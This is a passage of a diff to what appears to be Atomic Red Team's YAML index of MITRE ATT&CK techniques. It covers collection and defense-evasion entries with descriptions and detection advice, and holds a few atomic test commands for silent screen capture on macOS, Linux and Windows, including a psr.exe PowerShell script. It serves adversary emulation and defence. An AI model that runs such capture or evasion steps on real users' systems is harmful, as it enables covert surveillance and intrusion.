to Target + Legacy Devices. Retrieved October 20, 2020. + - source_name: US-CERT TA18-068A 2018 + url: https://www.us-cert.gov/ncas/alerts/TA18-086A + description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted + by Cyber Actors. Retrieved October 2, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Network Device Configuration Dump + description: "Adversaries may access network configuration files to collect + sensitive data about the device and the network. The network configuration + is a file containing parameters that determine the operation of the device. + The device typically stores an in-memory copy of the configuration while operating, + and a separate configuration on non-volatile storage to load after device + reset. Adversaries can inspect the configuration files to reveal information + about the target network and its layout, the network device and its software, + or identifying legitimate accounts and credentials for later use.\n\nAdversaries + can use common management tools and protocols, such as Simple Network Management + Protocol (SNMP) and Smart Install (SMI), to access network configuration files. + (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation: + Cisco Blog Legacy Device Attacks) These tools may be used to query specific + data from a configuration repository or configure the device to export the + configuration for later analysis. " + id: attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-10-22T01:45:55.144Z' + created: '2020-10-20T00:08:21.745Z' + x_mitre_data_sources: + - Netflow/Enclave netflow + - Network protocol analysis + - Packet capture + x_mitre_permissions_required: + - Administrator + x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts + or networks. Configure signatures to identify strings that may be found in + a network device configuration. (Citation: US-CERT TA18-068A 2018)' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Network + atomic_tests: [] + T1074.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1074.002 + url: https://attack.mitre.org/techniques/T1074/002 + - source_name: Mandiant M-Trends 2020 + url: https://content.fireeye.com/m-trends/rpt-m-trends-2020 + description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, + 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Remote Data Staging + description: |- + Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location. + + In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020) + + By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection. + id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-09-14T19:48:07.491Z' + created: '2020-03-13T21:14:58.206Z' + x_mitre_contributors: + - Praetorian + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_detection: |- + Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. + + Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + x_mitre_data_sources: + - Process command-line parameters + - Process monitoring + - File monitoring + x_mitre_platforms: + - Linux + - macOS + - Windows + - AWS + - GCP + - Azure + atomic_tests: [] + T1114.002: + technique: + created: '2020-02-19T18:52:24.547Z' + modified: '2020-02-19T20:53:50.908Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + type: attack-pattern + id: attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a + description: Adversaries may target an Exchange server or Office 365 to collect + sensitive information. Adversaries may leverage a user's credentials and interact + directly with the Exchange server to acquire information from within a network. + Adversaries may also access externally facing Exchange services or Office + 365 to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) + can be used to automate searches for specific keywords. + name: Remote Email Collection + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1114.002 + url: https://attack.mitre.org/techniques/T1114/002 + x_mitre_platforms: + - Office 365 + - Windows + x_mitre_data_sources: + - Authentication logs + - Email gateway + - Mail server + - Office 365 trace logs + x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal + locations, especially for privileged accounts (ex: Exchange administrator + account).' + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] + T1602.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1602.001 + url: https://attack.mitre.org/techniques/T1602/001 + - source_name: SANS Information Security Reading Room Securing SNMP Securing + SNMP + url: https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051 + description: 'Michael Stump. (2003). Information Security Reading Room Securing + SNMP: A Look atNet-SNMP (SNMPv3). Retrieved October 19, 2020.' + - source_name: US-CERT-TA18-106A + url: https://www.us-cert.gov/ncas/alerts/TA18-106A + description: US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored + Cyber Actors Targeting Network Infrastructure Devices. Retrieved October + 19, 2020. + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. + - source_name: Cisco Advisory SNMP v3 Authentication Vulnerabilities + url: https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3 + description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation + of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October + 19, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: SNMP (MIB Dump) + description: "Adversaries may target the Management Information Base (MIB) to + collect and/or mine valuable information in a network managed using Simple + Network Management Protocol (SNMP).\n\nThe MIB is a configuration repository + that stores variable information accessible via SNMP in the form of object + identifiers (OID). Each OID identifies a variable that can be read or set + and permits active management tasks, such as configuration changes, through + remote modification of these variables. SNMP can give administrators great + insight in their systems, such as, system information, description of hardware, + physical location, and software packages(Citation: SANS Information Security + Reading Room Securing SNMP Securing SNMP). The MIB may also contain device + operational information, including running configuration, routing table, and + interface details.\n\nAdversaries may use SNMP queries to collect MIB content + directly from SNMP-managed devices in order to collect network information + that allows the adversary to build network maps and facilitate future targeted + exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device + Attacks) " + id: attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-10-22T01:54:22.812Z' + created: '2020-10-19T23:51:05.953Z' + x_mitre_data_sources: + - Netflow/Enclave netflow + - Network protocol analysis + - Packet capture + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts + or networks that expose MIB content or use unauthorized protocols.(Citation: + Cisco Advisory SNMP v3 Authentication Vulnerabilities)' + x_mitre_platforms: + - Network + atomic_tests: [] + T1113: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1113 + url: https://attack.mitre.org/techniques/T1113 + - external_id: CAPEC-648 + source_name: capec + url: https://capec.mitre.org/data/definitions/648.html + - source_name: CopyFromScreen .NET + url: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8 + description: Microsoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved + March 24, 2020. + - url: https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/ + description: Thomas Reed. (2017, January 18). New Mac backdoor using antiquated + code. Retrieved July 5, 2017. + source_name: Antiquated Mac Malware + description: 'Adversaries may attempt to take screen captures of the desktop + to gather information over the course of an operation. Screen capturing functionality + may be included as a feature of a remote access tool used in post-compromise + operations. Taking a screenshot is also typically possible through native + utilities or API calls, such as CopyFromScreen, xwd, + or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated + Mac Malware) + +' + name: Screen Capture + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-03-24T19:56:37.627Z' + created: '2017-05-31T21:31:25.060Z' + x_mitre_is_subtechnique: false + x_mitre_version: '1.1' + x_mitre_data_sources: + - API monitoring + - Process monitoring + - File monitoring + x_mitre_detection: Monitoring for screen capture behavior will depend on the + method used to obtain data from the operating system and write output files. + Detection methods could include collecting information from unusual processes + using API calls used to obtain image data, and monitoring for image files + written to disk. The sensor data may need to be correlated with other events + to identify malicious activity, depending on the legitimacy of this behavior + within a given network environment. + x_mitre_platforms: + - Linux + - macOS + - Windows + identifier: T1113 + atomic_tests: + - name: Screencapture + auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac + description: 'Use screencapture command to collect a full desktop screenshot + +' + supported_platforms: + - macos + input_arguments: + output_file: + description: Output file path + type: Path + default: "/tmp/T1113_desktop.png" + executor: + command: 'screencapture #{output_file} + +' + cleanup_command: 'rm #{output_file} + +' + name: bash + - name: Screencapture (silent) + auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 + description: 'Use screencapture command to collect a full desktop screenshot + +' + supported_platforms: + - macos + input_arguments: + output_file: + description: Output file path + type: Path + default: "/tmp/T1113_desktop.png" + executor: + command: 'screencapture -x #{output_file} + +' + cleanup_command: 'rm #{output_file} + +' + name: bash + - name: X Windows Capture + auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac + description: 'Use xwd command to collect a full desktop screenshot and review + file with xwud + +' + supported_platforms: + - linux + input_arguments: + output_file: + description: Output file path + type: Path + default: "/tmp/T1113_desktop.xwd" + executor: + command: | + xwd -root -out #{output_file} + xwud -in #{output_file} + cleanup_command: 'rm #{output_file} + +' + name: bash + - name: Capture Linux Desktop using Import Tool + auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 + description: 'Use import command from ImageMagick to collect a full desktop + screenshot + +' + supported_platforms: + - linux + input_arguments: + output_file: + description: Output file path + type: Path + default: "/tmp/T1113_desktop.png" + dependencies: + - description: 'ImageMagick must be installed + +' + prereq_command: 'if import --version; then exit 0; else exit 1; fi + +' + get_prereq_command: 'sudo apt-get -y install imagemagick + +' + executor: + command: 'import -window root #{output_file} + +' + cleanup_command: 'rm #{output_file} + +' + name: bash + - name: Windows Screencapture + auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153 + description: 'Use Psr.exe binary to collect screenshots of user display. Test + will do left mouse click to simulate user behaviour + +' + supported_platforms: + - windows + input_arguments: + output_file: + description: Output file path + type: Path + default: c:\temp\T1113_desktop.zip + recording_time: + description: Time to take screenshots + type: String + default: 5 + executor: + name: powershell + elevation_required: false + command: | + cmd /c start /b psr.exe /start /output #{output_file} /sc 1 /gui 0 /stopevent 12 + Add-Type -MemberDefinition '[DllImport("user32.dll")] public static extern void mouse_event(int flags, int dx, int dy, int cButtons, int info);' -Name U32 -Namespace W; + [W.U32]::mouse_event(0x02 -bor 0x04 -bor 0x01, 0, 0, 0, 0); + cmd /c "timeout #{recording_time} > NULL && psr.exe /stop" + cleanup_command: 'rm #{output_file} -ErrorAction Ignore' + T1213.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1213.002 + url: https://attack.mitre.org/techniques/T1213/002 + - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2 + description: Microsoft. (2017, July 19). Configure audit settings for a site + collection. Retrieved April 4, 2018. + source_name: Microsoft SharePoint Logging + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Sharepoint + description: | + Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint: + + * Policies, procedures, and standards + * Physical / logical network diagrams + * System architecture diagrams + * Technical system documentation + * Testing / development credentials + * Work / project schedules + * Source code snippets + * Links to network shares and other internal resources + id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-03-24T16:41:00.821Z' + created: '2020-02-14T13:35:32.938Z' + x_mitre_detection: "The user access logging within Microsoft's SharePoint can + be configured to report access to certain pages and documents. (Citation: + Microsoft SharePoint Logging). As information repositories generally have + a considerably large user base, detection of malicious use can be non-trivial. + At minimum, access to information repositories performed by privileged users + (for example, Active Directory Domain, Enterprise, or Schema Administrators) + should be closely monitored and alerted upon, as these types of accounts should + not generally used to access information repositories. If the capability exists, + it may be of value to monitor and alert on users that are retrieving and viewing + a large number of documents and pages; this behavior may be indicative of + programmatic means being used to retrieve all data within the repository. + In environments with high-maturity, it may be possible to leverage User-Behavioral + Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n" + x_mitre_data_sources: + - Office 365 audit logs + - Authentication logs + - Application logs + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Windows + - Office 365 + atomic_tests: [] + T1125: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + url: https://attack.mitre.org/techniques/T1125 + external_id: T1125 + - external_id: CAPEC-634 + source_name: capec + url: https://capec.mitre.org/data/definitions/634.html + - url: https://objective-see.com/blog/blog_0x25.html + description: Patrick Wardle. (n.d.). Retrieved March 20, 2018. + source_name: objective-see 2017 review + description: |- + An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files. + + Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen. + + In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review) + name: Video Capture + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-07-14T19:40:47.644Z' + created: '2017-05-31T21:31:37.917Z' + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' + x_mitre_contributors: + - Praetorian + x_mitre_data_sources: + - Process monitoring + - File monitoring + - API monitoring + x_mitre_detection: |- + Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system. + + Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data. + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Windows + - macOS + atomic_tests: [] + T1056.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1056.003 + url: https://attack.mitre.org/techniques/T1056/003 + - external_id: CAPEC-569 + source_name: capec + url: https://capec.mitre.org/data/definitions/569.html + - url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/ + description: 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco + Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.' + source_name: Volexity Virtual Private Keylogging + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Web Portal Capture + description: |- + Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service. + + This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging) + id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2020-03-24T21:16:16.580Z' + created: '2020-02-11T18:59:50.058Z' + x_mitre_system_requirements: + - An externally facing login portal is configured. + x_mitre_data_sources: + - File monitoring x_mitre_detection: File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content. - x_mitre_data_sources: - - File monitoring - x_mitre_system_requirements: - - An externally facing login portal is configured. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Linux + - macOS + - Windows atomic_tests: [] defense-evasion: T1548: @@ -21562,7 +25175,7 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-25T19:57:54.923Z' + modified: '2020-07-22T21:36:52.825Z' created: '2020-01-30T13:58:14.373Z' x_mitre_data_sources: - Windows Registry @@ -21692,23 +25305,26 @@ defense-evasion: - source_name: mitre-attack external_id: T1550.001 url: https://attack.mitre.org/techniques/T1550/001 + - external_id: CAPEC-593 + source_name: capec + url: https://capec.mitre.org/data/definitions/593.html - description: Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019. url: https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/ source_name: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019 - - source_name: okta - url: https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen - description: okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved + - description: okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019. - - source_name: Microsoft Identity Platform Access 2019 - url: https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens - description: Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). + url: https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen + source_name: okta + - description: Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019. - - source_name: Staaldraad Phishing with OAuth 2017 - url: https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/ - description: Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. + url: https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens + source_name: Microsoft Identity Platform Access 2019 + - description: Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019. + url: https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/ + source_name: Staaldraad Phishing with OAuth 2017 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -21728,9 +25344,9 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-03-23T20:24:52.899Z' + modified: '2020-09-16T19:40:02.024Z' created: '2020-01-30T17:37:22.261Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_defense_bypassed: - System Access Controls @@ -22072,6 +25688,9 @@ defense-evasion: - external_id: CAPEC-572 source_name: capec url: https://capec.mitre.org/data/definitions/572.html + - external_id: CAPEC-655 + source_name: capec + url: https://capec.mitre.org/data/definitions/655.html - source_name: ESET OceanLotus description: Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018. @@ -22081,7 +25700,7 @@ defense-evasion: description: Ishimaru, S.. (2017, April 13). Old Malware Tricks To Bypass Detection in the Age of Big Data. Retrieved May 30, 2019. - source_name: VirusTotal FAQ - url: 'https://www.virustotal.com/en/faq/ ' + url: https://www.virustotal.com/en/faq/ description: VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 @@ -22106,7 +25725,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T20:50:48.023Z' + modified: '2020-09-17T18:25:33.828Z' created: '2020-02-05T14:04:25.865Z' x_mitre_contributors: - Martin Jirkal, ESET @@ -22121,7 +25740,7 @@ defense-evasion: exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file. ' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - Linux @@ -22171,6 +25790,9 @@ defense-evasion: - source_name: mitre-attack external_id: T1542.003 url: https://attack.mitre.org/techniques/T1542/003 + - external_id: CAPEC-552 + source_name: capec + url: https://capec.mitre.org/data/definitions/552.html - source_name: Mandiant M Trends 2016 url: https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved @@ -22196,13 +25818,13 @@ defense-evasion: phase_name: persistence - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-05-07T22:32:05.335Z' + modified: '2020-09-17T19:47:14.338Z' created: '2019-12-19T21:05:38.123Z' x_mitre_defense_bypassed: - Host intrusion prevention systems - Anti-virus - File monitoring - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator @@ -22231,7 +25853,7 @@ defense-evasion: * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit) Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) - name: Bypass User Access Control + name: Bypass User Account Control created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 @@ -22284,7 +25906,7 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-25T19:57:54.510Z' + modified: '2020-07-22T21:36:52.458Z' created: '2020-01-30T14:24:34.977Z' x_mitre_platforms: - Windows @@ -22311,7 +25933,7 @@ defense-evasion: x_mitre_effective_permissions: - Administrator x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_defense_bypassed: - Windows User Account Control identifier: T1548.002 @@ -22531,7 +26153,7 @@ defense-evasion: Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application. - CMSTP.exe can also be abused to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) + CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) id: attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49 type: attack-pattern kill_chain_phases: @@ -22560,7 +26182,7 @@ defense-evasion: Sysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018) * To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external. - * To detect [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F). + * To detect [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F). x_mitre_platforms: - Windows identifier: T1218.003 @@ -22666,7 +26288,7 @@ defense-evasion: The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013) - Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017) + Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017) id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335 type: attack-pattern kill_chain_phases: @@ -22836,41 +26458,64 @@ defense-evasion: - source_name: mitre-attack external_id: T1070.003 url: https://attack.mitre.org/techniques/T1070/003 + - source_name: Microsoft PowerShell Command History + url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7 + description: Microsoft. (2020, May 13). About History. Retrieved September + 4, 2020. + - source_name: Sophos PowerShell command audit + url: https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit + description: jak. (2020, June 27). Live Discover - PowerShell command audit. + Retrieved August 21, 2020. + - source_name: Sophos PowerShell Command History Forensics + url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics + description: Vikas, S. (2020, August 26). PowerShell Command History Forensics. + Retrieved September 4, 2020. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Clear Command History description: |- - In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. macOS and Linux both keep track of the commands users type in their terminal so that users can retrace what they've done. + In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. - These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before 